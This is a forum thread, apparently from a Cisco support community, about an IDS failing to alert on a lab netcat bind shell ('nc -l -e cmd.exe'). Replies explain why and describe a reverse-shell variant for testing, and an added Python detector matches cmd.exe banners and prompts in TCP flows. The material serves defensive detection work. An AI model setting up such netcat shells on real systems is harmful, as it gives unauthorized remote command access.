IPS will not detect a successful netcat attack

Unanswered Question
Sep 13th, 2007

I am doing the following lab testing:

nc -v -l -e cmd.exe -p 565

nc -v .x.x.x.x 565

I was able to get the remote prompt and the IDS never fires an alarm. Is there a signature for detecting this kind of attack? Or, is there any signature tuning that can be done for that? What would be the best way for detecting and firing an alarm for that attack?

Any help is highly appreciated.

jopontes Thu, 09/13/2007 - 12:23


nc -v -l -e cmd.exe -p 565

nc -v .x.x.x.x 565

mhellman Fri, 09/14/2007 - 09:29

You are using netcat to setup a listener on port 565 and asking it to execute cmd.exe when a client connects. It doesn't actually send "cmd.exe" to the client, it redirects STDIN and STDOUT to the client.

To trigger your signature, setup the listener without a "-e" command. Have the client use "-e cmd.exe" when connecting.

jopontes Fri, 09/14/2007 - 09:59

Got it! But, as a matter of fact my doubt was:

Can IDS sensors detect netcat activity on the network? Does netcat operate within the RFC TCP standards, and is it therefore seen as normal traffic?

mhellman Fri, 09/14/2007 - 10:05

Not reliably AFAIK. It's not like telnet or ftp that tend to use specific ports or have application RFCs. With the latest version of Cisco IDS you might be able to trigger on unusual port usage (anomaly detection). I haven't played with that much yet myself.
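
The two replies above leave the practitioner with one thing to match on: netcat itself is plain TCP on whatever port you pick, but the program it hands over does talk. When "-e cmd.exe" runs, cmd.exe writes its startup banner and a drive-letter prompt into the connection, and that text crosses the wire in the direction of the side that did NOT run "-e". The following is an added example, not code from this thread or from the Cisco IDS product: a small Python flow classifier that flags a bind shell (listener ran "-e cmd.exe", so shell output flows server to client, as in the original post) or a reverse shell (connecting side ran "-e cmd.exe", so shell output flows client to server, the variant mhellman suggests for testing) from cmd.exe's banner or prompt, on any port. The Flow and Alert types, the hosts, ports and payloads are constructed for the example; the banner wording is the text cmd.exe prints on older (XP-era) and current Windows releases.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Added example, not code from the thread or from Cisco IDS. A "nc -e cmd.exe"
# shell puts nothing on the wire that says "netcat" or "cmd.exe"; what it does
# put on the wire is cmd.exe's own output. These two patterns cover the startup
# banner ("Microsoft Windows XP [Version 5.1.2600]\r\n(C) Copyright ... Microsoft Corp."
# on older releases, "Microsoft Windows [Version 10.0...]\r\n(c) Microsoft Corporation..."
# on newer ones) and the drive-letter prompt ("C:\WINDOWS\system32>").
CMD_BANNER_RE = re.compile(
    rb"Microsoft Windows[^\[\r\n]*\[Version [0-9.]+\]\r?\n"
    rb"\(c\) (?:Copyright [0-9\- ]+)?Microsoft Corp",
    re.IGNORECASE,
)
CMD_PROMPT_RE = re.compile(rb"(?m)^[A-Za-z]:\\[^\r\n>]*>")


@dataclass
class Flow:
    """One TCP connection. 'client' is the side that sent the SYN."""
    client: str
    server: str
    dport: int
    # Payloads in wire order; direction is "c2s" (client to server) or "s2c".
    segments: List[Tuple[str, bytes]] = field(default_factory=list)


@dataclass
class Alert:
    kind: str       # "bind-shell" or "reverse-shell"
    evidence: str   # "banner" or "prompt"
    client: str
    server: str
    dport: int


def detect_cmd_shell(flow: Flow) -> Optional[Alert]:
    """Return an Alert if either side of the flow is handing out a cmd.exe."""
    for direction, data in flow.segments:
        if CMD_BANNER_RE.search(data):
            evidence = "banner"
        elif CMD_PROMPT_RE.search(data):
            evidence = "prompt"
        else:
            continue
        # Shell output travelling server->client means the listener ran
        # "-e cmd.exe" (the bind shell in the original post). Shell output
        # travelling client->server means the connecting side ran "-e cmd.exe"
        # (a reverse shell), which is the variant suggested for testing.
        kind = "bind-shell" if direction == "s2c" else "reverse-shell"
        return Alert(kind, evidence, flow.client, flow.server, flow.dport)
    return None


# Constructed sample traffic (not captures): hosts, ports and payloads are made up.
XP_BANNER = (b"Microsoft Windows XP [Version 5.1.2600]\r\n"
             b"(C) Copyright 1985-2001 Microsoft Corp.\r\n\r\nC:\\WINDOWS\\system32>")
WIN10_BANNER = (b"Microsoft Windows [Version 10.0.19045.3803]\r\n"
                b"(c) Microsoft Corporation. All rights reserved.\r\n\r\nC:\\Users\\lab>")

SAMPLE_FLOWS = [
    # 1. The original post: "nc -l -e cmd.exe -p 565" on 10.0.0.9, a client connects.
    Flow("10.0.0.5", "10.0.0.9", 565, [("s2c", XP_BANNER), ("c2s", b"dir\r\n")]),
    # 2. The reversed test: client runs "nc -e cmd.exe 10.0.0.5 4444" to a plain listener.
    Flow("10.0.0.9", "10.0.0.5", 4444, [("c2s", WIN10_BANNER)]),
    # 3. Ordinary web traffic: no shell content.
    Flow("10.0.0.5", "10.0.0.20", 80,
         [("c2s", b"GET / HTTP/1.1\r\nHost: intranet\r\n\r\n"),
          ("s2c", b"HTTP/1.1 200 OK\r\nContent-Length: 5\r\n\r\nhello")]),
    # 4. netcat used as a chat pipe on the same port 565, no "-e": nothing to match on.
    Flow("10.0.0.5", "10.0.0.9", 565, [("c2s", b"hello?\r\n"), ("s2c", b"hi\r\n")]),
    # 5. Banner missed (flow picked up mid-session); only the prompt is seen.
    Flow("10.0.0.5", "10.0.0.9", 565, [("s2c", b"C:\\Documents and Settings\\lab>")]),
]


def run_samples() -> List[Optional[Tuple[str, str]]]:
    """Classify every sample flow; None means no alert."""
    results = []
    for flow in SAMPLE_FLOWS:
        alert = detect_cmd_shell(flow)
        results.append((alert.kind, alert.evidence) if alert else None)
    return results


if __name__ == "__main__":
    for flow, result in zip(SAMPLE_FLOWS, run_samples()):
        print(f"{flow.client} -> {flow.server}:{flow.dport}  {result or 'no alert'}")
```

Running the script prints one line per sample flow. The match is deliberately port-independent: nothing ties a netcat shell to 565, so content from the interpreter is the only practical signature, and the chat-only flow on the same port shows the limit stated in the reply above, that bare netcat traffic is indistinguishable from any other TCP stream. The prompt pattern by itself will also fire on ordinary text that happens to contain a Windows path followed by ">", so in a real sensor it belongs behind the banner match or restricted to ports where no shell prompt should ever appear.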

jopontes Fri, 09/14/2007 - 10:31

Thanks Matt! I'll try to update the sensor and play with that then.

